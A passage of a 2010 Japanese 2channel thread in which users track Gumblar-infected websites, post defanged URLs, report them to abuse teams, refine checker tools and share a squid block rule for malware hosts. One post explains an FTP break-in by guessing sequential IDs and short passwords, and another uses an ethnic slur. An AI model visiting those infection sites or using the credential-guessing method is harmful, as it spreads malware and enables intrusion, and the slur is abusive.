204 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 08:59:08 ]: 火狐ざまあ
205 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 10:02:16 ]: GENOもガンブラーも作ってるのは日本人だよ
これだけははっきりと言える
206 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 11:00:11 ]: >>205
理由は？
207 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 11:03:30 ]: 作った本人なんだろ
通報しとくわ
208 名前：名無しさん＠お腹いっぱい。 [2010/02/11(木) 11:16:11 ]: 普通に考えて日本人だろ
日本人じゃなきゃ利用しないようなサイトが感染されているケースが多過ぎる
209 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 11:17:23 ]: >>208
それは違うだろｗ
210 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 11:25:35 ]: ただこのスレに晒されているURLが日本ばっかりだから勘違いしたんでしょ？
211 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 11:32:21 ]: ばーかｂ－か
212 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 11:43:40 ]: >>205と>>208は本当に馬鹿だな
213 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 12:26:06 ]: >>202
Silverlightでも、HTML5でも。
214 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 12:34:18 ]: >>205
>>208
>>205
>>208
>>205
>>208
>>205
>>208
>>205
>>208
215 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 12:38:23 ]: >>205
>>208
>>205
>>208
>>205
>>208
>>205
>>208
>>205
>>208
216 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 12:58:48 ]: >>196
つまりそれって、>>194が感染してるんじゃなくて、サーバが直接やられたってこと？

私も194と同じ環境なので、ヒトゴトじゃないです。
念のため全部確認しに行くか。大手鯖しか使ってないから大丈夫と信じたいけど。
217 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 13:03:01 ]: 犯人は日本人、あるいは外国人の男性、もしくは女性
218 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 13:05:06 ]: 犯人はヤス
219 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 13:06:58 ]: >>146
これ自分で書いといてあれだが、遮断するのは2/22からだったんだな
緊急措置ならさっさとやってくれよｗ
220 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 13:42:20 ]: GENOウィルスチェッカーって今あてになるの？
221 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 13:54:09 ]: >>220
笑わすなｗ
わけ分からずに言われるがまま使うならモノが何でも意味ねえだろ
222 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 14:05:31 ]: で、あてになるの？
223 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 14:12:46 ]: ググれカス
224 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 14:23:36 ]: 前言ったロシアの地震予知サイトなんだがスレにいる人柱によるとまた感染してるらしい。Dr.Webとgredでは安全との事なんだが・・・
quake_vnb●rshu●ru/index_eng●html
ここでは報告されたか分からんが元祖GENOも含め計3回目の感染らすぃ・・・
225 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 14:29:24 ]: >>224
Gumblar Checker 3で検出されないことを確認したので、現在パターンを試行錯誤中です。
対応までしばらくお待ちください。
226 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 14:46:03 ]: >>221
だってどうみても感染してないサイトが100%とかなってるんだけど
227 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 15:29:59 ]: >>225
ってかgithubにUPして
228 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 15:35:59 ]: >>220
GENOウイルスチェッカーってまさか去年のやつ…？
あれはもう古いぞ
229 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 15:49:15 ]: 遅れましたが>>224のスクリプトに対応しました。
gumblar.s1.dynamitelife.net/ver3/

>>227
考えておきます。
230 名前：227 mailto:sage [2010/02/11(木) 16:02:18 ]: >>229
ありがとう
よろしく
231 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 16:04:14 ]: >>228
マジで
バカなこときいてごめん…
232 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 16:37:03 ]: 去年のチェッカーなんかリリース直後に信用ならん判定出てたのにｗ
233 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 16:41:22 ]: 糞チェッカは糞
234 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 16:48:56 ]: 質問なんだけど、>>233の糞チェッカっていうのは、
GENOウイルスチェッカー（geno.2ch.tc/）を指してるの？
235 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 16:59:14 ]: readerのバージョン古いまま放置とかほんとに糞説明の糞サイトだな
236 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 17:19:19 ]: >>235
お前がやれよｗ
237 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 17:34:52 ]: //www●jtmetal●jp/data/index2●html
/*CODE1*/
238 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 18:09:32 ]: >>216
Gumblarとの関連は不明だけどCMSに脆弱性があって狙われていたのは事実
BASE64でやられてたとこも同じ

自分は大丈夫と思わず常に注意は必要
大手だから大丈夫とか根拠のない思い込みはやめたほうがいい
信じる信じないの問題じゃないです
239 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 18:22:24 ]: 以上だ、何か質問ある？
240 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 18:23:24 ]: 大手だからといって大丈夫と思ってる奴まだ居たのか。
241 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 18:32:21 ]: 大手は大丈夫
任天堂もトヨタも平気だし
242 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 18:33:57 ]: 超大手じゃん
243 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 18:38:45 ]: Gumblar Checker ver2/ver3の管理者様
ver2はIE8でチェックすると途切れ続けます。
最初の製作者様の時もそうで、その後対応されてからは症状が出ませんでした。
ver3はチェックすると文字化けするんですが自分だけでしょうか。
244 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 19:02:23 ]: >>208
www.just-kaspersky.jp/products/info/alert_gumblar.html

> 2009年10月14日にこのマルウェアを検知してから、11月13日現在までカスペルスキーでは既に
> 国内1,250件以上（世界70,000件以上）の感染サイトを確認しており、大手ISPや管理機関と共に、
> 連携を始めています。
245 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 19:18:31 ]: >>243
とりあえずIETester入れて試してみましたが、どちらの現象も再現出来ませんでした。
ver3の方はとりあえず対策っぽいのをしてみましたが、いかがでしょうか。
246 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 19:27:34 ]: >245
対応ありがとうございます。ver3は文字化けしなくなりました。
ver2の途切れ状態ですが、チェック後は大丈夫ですが下にスクロールすると途切れ出します。
ちなみに、製作者様からの当時の回答です。↓
>ハイライト表示に使っているSyntaxHighlighterの一部機能がIE8と相性が悪いようで、この機能を無効にすることで修正しました
247 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 19:48:44 ]: >>246
SyntaxHighlighterをUAにTrident/4.0が入っていると無効にするようにしてみましたがいかがでしょうか。
248 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 19:50:46 ]: >247
途切れなくなりました！
勝手なお願いに、すばやく対応してくださりありがとうございました。
いつもお世話になっております。
249 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 20:30:05 BE:5660249-2BP(1236)]: >>237
めるぽしました。
pc11.2ch.net/test/read.cgi/sec/1263865118/94
まだ残ってたのか…
250 名前：名無しさん＠お腹いっぱい。 [2010/02/11(木) 21:48:56 ]: www●lets-juken●com
は放置みたいだな
251 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 21:52:42 ]: //dreamcafe●s17●xrea.com/

二重感染
252 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 21:55:11 ]: //tantei-shoukai●com/
253 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 22:01:15 ]: //cherry●piyo●to/st/s/o/index.html
254 名前：名無しさん＠お腹いっぱい。 [2010/02/11(木) 22:44:34 ]: >>250
aguse Gateway(Kaspersky?)でスルー(T_T)　ESETでブロック
255 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 22:57:47 ]: 感染覚悟でURL報告大変ですなあ
>>3をしっかり行っているとは思いますが
256 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 22:59:20 ]: >>255
なんか何にもわかってない気がする
257 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 23:16:09 ]: >>255みたいな子は真似しないでね！
258 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 23:25:58 ]: >>255
まあとりあえず赤くしておこうか
259 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 23:33:16 ]: >>255　これだから初心者は・・・

Adobe Reader以外のPDFソフトで感染報告は無いの？
260 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 23:47:25 ]: これだからチャンコロ連中は･･･
そんなに照れるなよ
261 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 23:53:26 ]: もう黙ってたほうがいいよ
262 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 23:58:07 ]: 死ねカス
263 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 00:03:13 ]: 無知を指摘されて切れちゃうとか
お里が知れるね
264 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 00:03:59 ]: カスにカスって言われてもｗ
265 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 00:13:29 ]: 情弱黙れｗｗ
266 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 00:16:16 ]: ＝＝＝＝＝＝＝＝＝ここまで俺一人の自作自演＝＝＝＝＝＝＝＝＝
267 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 00:17:47 ]: 楽しゅうございました
268 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 00:50:46 ]: >>250
index.htmlは修正したけど/javascript/swapimage.js が絶賛放置中
Last-Modified: Fri, 22 Jan 2010 01:53:43 GMT /*Exception*/
パスワード変える知恵はあったか
269 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 01:45:51 BE:1887034-2BP(1236)]: >>250
8日（月曜日）にさくらインターネットAbuse対策チームへ再めるぽしてます。。。。
届いてにゃいのか。。。

>>251-252
でじろ

>>253
cherry●piyo●to陥落、サンプルページも感染中。
whoisから210.233.74.155の鯖缶へめるぽ。

aguse落ちてる？
270 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 02:09:35 ]: >>269
つーほー乙です。
271 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 02:23:30 ]: 見返りを求めてんだろうよ
272 名前：名無しさん＠お腹いっぱい。 [2010/02/12(金) 04:19:57 ]: 250って1月にもつーほーしたんだよな。
273 名前：名無しさん＠お腹いっぱい。 [2010/02/12(金) 04:26:44 ]: >>250はVBでブロック。
274 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 04:47:40 BE:2516328-2BP(1236)]: >>272 pc11.2ch.net/test/read.cgi/sec/1263822552/280+299
>>269の8日（月曜日）に送った内容（一部省略してます）は以下でCCでJPCERT/CCにも送付してその自動応答あり。
----------------------------------------------------------------------------------------------------
お疲れ様です。
今現在、 www●lets-juken●com/javascript/swapimage.js にはまだガンブラーのスクリプトがあります。

(2010/01/22 14:57), SAKURA Internet support wrote:
>
> 　さくらインターネットAbuse対策チームの○○と申します。
> -----
>> www●lets-juken●com/index.html
>> www●lets-juken●com/javascript/swapimage.js
>>
>>
>> 悪意のあるスクリプトがあります。
>> スクリプトは常に更新されている模様です。
>>
>> ガンブラー8080です。
>> 迅速な対応を切に願います。
>> これまでに訪れた人にも注意喚起を行ってください。
>>
>> 該当サイトに連絡できるメールアドレスが見当たらなかったので
>> Whois情報からお知らせしますことをご容赦ください。
>>
>> また同時にJPCERT/CCにもお知らせします。
>
> -----
> 　当該コンテンツ管理者へは早急に対応要請を行わせていただ
> きました。
>
> 　この度は、情報提供をいただきまして有難うございます。
275 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 04:49:06 BE:7703377-2BP(1236)]: まぁ、感染サイトがいぱーいあるので対応も後手後手になってるのかも。。。
276 名前：名無しさん＠お腹いっぱい。 [2010/02/12(金) 04:55:33 ]: なおすきなさそうだからどこかで「危険サイト」としてさらせないものかな。
277 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 05:12:01 ]: 2010/02/12 5:08:42 http://ｗｗｗ.lets-juken.com/javascript/swapimage.js Opera Internet Browser Denied: HEUR:Trojan-Downloader.Script.Generic
Exception型なのに変なの
278 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 09:19:23 ]: www●7chord●com/mobile/

try-function型改良版？
279 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 09:42:04 ]: squid.conf での対策の一例：

acl gumblarhost dstdomain thechocolateweb.ru を参考にして

acl gumblaruri url_regex ^.*\.ru:8080/
を追加して deny するとよし！なのかなのか？
280 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 10:20:42 ]: Adobe Flash Player 10.0.45.2
ttp://get.adobe.com/jp/flashplayer/
281 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 10:46:37 ]: 俺の端末に落ちてくるfile.exeは相変わらずまともに動いてくれないんだが・・・
みんなよく感染できるなｗ
282 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 10:47:49 ]: Security update available for Adobe Flash Player
www.adobe.com/support/security/bulletins/apsb10-06.html
283 名前：へたれ発掘屋 mailto:sage [2010/02/12(金) 11:10:14 ]: ver～(2発混在)
tp://slim●nonedust●com/link/

eval
tp://www●rubbersoul●ne●jp/store/home●htm

ver～、this～(2発混在)
tp://www●ojika-ns●jp/21gihu

最新型が釣れにくいorz
284 名前：194 mailto:sage [2010/02/12(金) 11:21:59 ]: >>216
>サーバが直接やられたってこと？
その通り。。
ガンブラーが登場する3年以上前から24時間全プロセスの監視してて
見慣れないexe実行を実行した形跡はログに無かったから確定してる

>$axxxxxxxx=xxxxxx;
この伏せた部分はFTPのIDとパスワードなんだが
自分のじゃなくて同じ鯖を利用している他人のIDとパスだった

うちの鯖はFTPのIDが英字3文字+数字4桁で規則性があって、
例えば始めに登録した奴がabc0001ならその次にアカウント登録した奴はabc0002になるって感じの連番

さらにはパスが適当な5桁のものに一定期間ごとに変わる（セキュリティ対策）って仕様だから
総当たりでいけば比較的簡単にIDとパスがわかる。

そんで今回自分はその5桁のまま変更していなかったからパスも短ければIDも規則性で簡単に推測できるって鯖に進入されたってこと

放置サイトでも油断できないな
285 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 11:32:01 ]: 「Adobe Reader」と「Flash Player」に深刻な脆弱性--アドビが警告
ttp://japan.cnet.com/news/sec/story/0,2000056024,20408437,00.htm
286 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 12:36:47 ]: >>285
カスadobe潰れろ。マジ。
287 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 12:53:22 ]: >>285
16日までゼロデイ脆弱性に怯えなきゃならんのか。
こないだ更新したばかりだというのに。
288 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 13:00:39 ]: 最終的にAdobeサイトも陥落したらどうなるの
289 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 13:01:15 ]: >>286
Adobeとかまだ使ってんのお前？ｗ
290 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 13:14:06 ]: >>287
Flashはもう10.0.45.2が出ているよ。
Readerの方は17日まで待ち。
291 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 13:18:37 ]: あらadobeって10.1まで待てみたいな記事あったけど
10.0の方で修正してくれたんだ
早速更新しよう
292 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 13:39:47 ]: >あら
じゃねーよハゲ
293 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 13:53:16 ]: ハ……ハハ禿ちゃうわ！
294 名前：名無しさん＠お腹いっぱい。 [2010/02/12(金) 13:57:37 ]: 情弱「死ねカス」
295 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 14:16:46 ]: 禿げって髪の毛一本もない状態から地肌がかすかに見えてる状態、
更にはかつらと分かる状態までを包含するスケーラビリティ高い単語やね
296 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 14:21:43 ]: そう考えると…ハゲじゃない人ってそう多くもなさそうだな
297 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 14:23:35 ]: おれはボーボーだ！！
298 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 15:07:00 BE:10061388-2BP(1236)]: >>283
whois ucom
めるぽ
whois ムームー
299 名前：名無しさん＠お腹いっぱい。 [2010/02/12(金) 16:21:14 ]: otokunatuuhan●com/campaign/asp-hikaku
300 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 16:26:20 ]: オトクナツウハン！ｗ
301 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 17:24:19 ]: >>290
お～、サンクスコ。
FLASHバージョンチェックの
下に表示されてる最新情報が
一つ前のままになってて
気がつかなかった。
302 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 17:31:18 ]: aguse gatewayで感染サイトにアクセスしてしまった・・・アウトかな？
303 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 17:32:14 ]: Flashを10.0.45.2にアップデートしてMyJVNチェッカでチェックしたら
最新じゃないって怒られた(´・ω・｀)
せめて登録されてるのよりバージョンが上なら最新扱いしようぜ
304 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 17:32:23 ]: せーふ
305 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 17:44:02 ]: 良かった。。。
306 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 17:51:16 ]: >>299
そのページの下から二番目のバーナーの会社経由で連絡を入れるそうです。。
307 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 18:34:47 ]: >>306
バーナーとかやめてよ
何燃やすんじゃ
308 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 18:41:27 ]: >>297
309 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 18:57:15 ]: せっかくボーボーの毛を燃しちゃうの？
310 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 18:58:43 ]: 禿　の　ね　た　み　か　！
311 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 19:33:49 ]: >>285
まだ脆弱性あんのか・・・
312 名前：へたれ発掘屋 mailto:sage [2010/02/12(金) 19:48:56 ]: ver～が更に難読化しちょります(汁;
tp://www●rakushobito●jp/place

.replace(/[･･･.replace(/[･･･.replace(/[･･･.replace(/[･･･.replace(/[･･･.replace(/[･･･.replace(/[･･･;var

(;ﾟДﾟ)･･･
313 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 19:53:52 ]: いずれ正規コードと見分けることが限りなく困難になる予感
314 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 20:03:13 ]: うわあなにそれ
315 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 20:04:47 ]: >>312
Dr. Webたんが反応した
真っ赤
316 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 20:10:17 ]: >>312
Gumblar Checker 3で対応しました。
gumblar.s1.dynamitelife.net/ver3/
317 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 20:20:40 ]: >>311
旧バージョンから残った脆弱性＋現バージョンの追加機能から発生する脆弱性があるわけだからな
それに修正したことで発生することもあるし完全にゼロにするのは不可能だよ
318 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 20:26:58 ]: チェッカーも統合ってできないんですかね？
319 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 20:38:25 ]: >>318
近いうちに統合します。
ただ、Gumblar.X Checkerのみ統合しない予定です。
320 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 20:44:12 ]: ありがとうございます。期待してます。
aguseじゃでなかったりするし、いろんなチェッカーで調べるのが
めんどかったので
321 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 20:51:05 ]: >>319
デコードできないもより
ttp://gumblar.s1.dynamitelife.net/ver3/result.php?url=http%3A%2F%2Fwww.rakushobito.jp%2Findex.html
322 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 20:58:47 ]: >>321
対応しました。
323 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 21:00:58 ]: >>322
お疲れ様です。
ありがとうございました。
324 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 21:07:41 ]: >>322
対応早いなあ
ほんと乙です
325 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 21:13:12 ]: チェッカーってどれ？
326 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 21:21:02 ]: www●rcsmovie●co●jp/
ttp://www.virustotal.com/jp/analisis/13789ebd4a7fa23e7e9db9b8f4e69b74ee062d886c345e26a754d36af4c6c6a1-1265975857
327 名前：名無しさん＠お腹いっぱい。 [2010/02/12(金) 21:33:01 ]: >>320
ウエブ検査で[Gumblarの可能性あり]というのがサイトイメージ下部に出てますよ
Gatewayじゃでないですね
328 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 21:46:37 ]: >>326
そこ3回目じゃん
サイトから駆除しただけで更新に使用しているPCから駆除できてないんじゃないのか
329 名前：名無しさん＠お腹いっぱい。 [2010/02/12(金) 21:48:17 ]: lets-juken.comやっと死んだな。
330 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 21:50:21 BE:8489669-2BP(1236)]: >>306
乙です。

>>312
めるぽしました。

>>326
(　ﾟДﾟ)ﾎﾟｶｰﾝ
331 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 22:28:11 ]: www●in-service●jp/
googlのセーフブラウジングに引っかかるね
332 名前：名無しさん＠お腹いっぱい。 [2010/02/12(金) 22:30:28 ]: >>331
www●in-service●jp/common●js
にGumblar.Xがかなり仕込まれてる
333 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 22:30:27 ]: >>284
解説ありがとうございます。
少しだけ安心して、それ以上に怖くなった。
それ、もしかしてウチの職場が使ってる鯖と同じかな。
ランダムパスだから抜きにくいだろうけど、さらに複雑化してみる。
334 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 22:43:17 ]: >>319
できればGumblarChecker 2を新型対応にする形で統合して欲しいなあ。
●をピリオドに自動置換する機能とか、使い勝手は3より2の方が優れているから。
335 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 22:46:22 ]: 本当にアドビとGumblar作ったやつと8080系作ったやつは死刑じゃ済まされないな
336 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 22:48:13 ]: はい
337 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 23:04:18 ]: Adobe以外のPDFソフトで感染したなんて人いるのかな
338 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 23:32:55 ]: adobeはたかが更新するだけなのに
わざわざ変なインストーラーをインスコさせようとするから腹立つ
なにがgetplusだ
339 名前：名無しさん＠お腹いっぱい。 [2010/02/12(金) 23:38:48 ]: >>338
「ご存知ですか？

Adobeの悪口を一度投稿するたびに金1万円の請求が届きます。

また、投稿を削除したとしても課金され支払う義務が発生します。

支払いを無視した暁には（ｒｙ」という謎のレスを創造した俺はきっと病気
340 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 23:40:23 ]: HDD容量、比較的狙われにくいマイナーさからみて
Foxit Reader、PDF X-change viewerに乗り換えた方が良いのだろうか
341 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 23:41:32 ]: google docs
342 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 23:45:47 ]: つーか、この期に及んで
自動更新期間のデフォルト値があり得ない数字だろ・・・

Flashは標準で一ヶ月
最短にしても一週間・・・
しかも、そのコンパネはネット上に・・・

毎日自動更新チェックするには設定ファイルを作る必要が・・・
itpro.nikkeibp.co.jp/article/COLUMN/20090309/326137/?ST=security&P=3
343 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 23:46:03 ]: Foxitは軽いけど広告がウザイからお勧めしない
344 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 23:51:07 ]: >>327
http:●www●rubbersoul.ne.jp/store/home.htm
ここがaguseじゃでないですね
チェッカー２だとでるんですが
345 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 23:51:57 ]: >>335
尻叩き1万発
346 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/12(金) 23:54:28 ]: >>340
どちらも日本語化は完全なのかな・・・
347 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 00:03:10 ]: Readerはそれなりのハード(メモリ量とGPU)と
レンダリング周りの設定を変更すれば、サクサクだと思う。
kb2.adobe.com/jp/cps/234/234416.html
・2D GPU アクセラレーションを使用
・ページキャッシュを使用
348 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 00:03:36 ]: >>343
あんな小さな広告も許せないお前は何使っても同じ。
349 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 00:07:12 ]: アバスト！だと反応しますが。
ttp://bukatsu.com/
ttp://www.eishinyobikou.com/
350 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 00:09:27 ]: >>349
>>1
＊＊＊危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください＊＊＊
351 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 00:10:33 ]: >>349
bukatsu.com
2重感染
eishinyobikou
同じく2重観戦

両方とも8080タイプのように見える・・・

で。URLは危険だから、.を●とかに置き換えようね＞＜；
352 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 00:15:05 ]: なんかaguseで検出されないのが増えてきたような・・・
チェッカー２だと検出されるけど
353 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 00:18:30 ]: aguseの中身はカスペルスキーなんだから新しい物は検出しなくて当然
354 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 00:25:19 ]: 検出されないの理解しました
再感染サイトも多いけど感染サイトを貼りまくってるのがいて困る・・・
355 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 00:29:49 ]: >>349
ウイルスにやられる予備校って嫌だなw
356 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 00:32:37 ]: >>348
だなあ…
アフィとかのバナーが貼られまくったサイトとか見に行っちゃったら憤死するんだろうな
357 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 07:14:01 ]: >>346
こんな感じで今のところ文字化けなどの不具合はないよ
www.dotup.org/uploda/www.dotup.org649503.png

>>343
広告は非表示でおk
358 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 09:48:56 ]: 【やっぱり罠だった】　職業訓練の案内ページ改ざん！閲覧でウイルス感染か！　www.ehdo.go.jp/
tsushima.2ch.net/test/read.cgi/news/1266021018/
359 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 09:49:37 BE:7545986-2BP(1236)]: >>331
whoisからめるぽとフォームからつーほー

>>349
さくら

>>283上
>>298のucomから対応の返事がきてた。403を確認。
360 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 10:01:06 ]: >>358
一週間前ぐらいに報告あったよなここ？
361 名前：名無しさん＠お腹いっぱい。 [2010/02/13(土) 10:06:12 ]: www●goldlane●co●jp
再感染　
362 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 10:19:34 ]: >>361
復号に一部失敗していたので修正しました。

>>334
個人的にはGumblar Checker 3のコードの方がいじりやすいので多分Gumblar Checker 3を旧型8080系に対応する形で行くと思います。
●を自動変換する機能などは統合するまでには対応します。
363 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 10:36:58 ]: ・●を自動変換する機能
・tp://やttp://等を入力した際にhttp://を補充する機能
をGumblar Checker 3に追加しました。

gumblar.s1.dynamitelife.net/ver3/
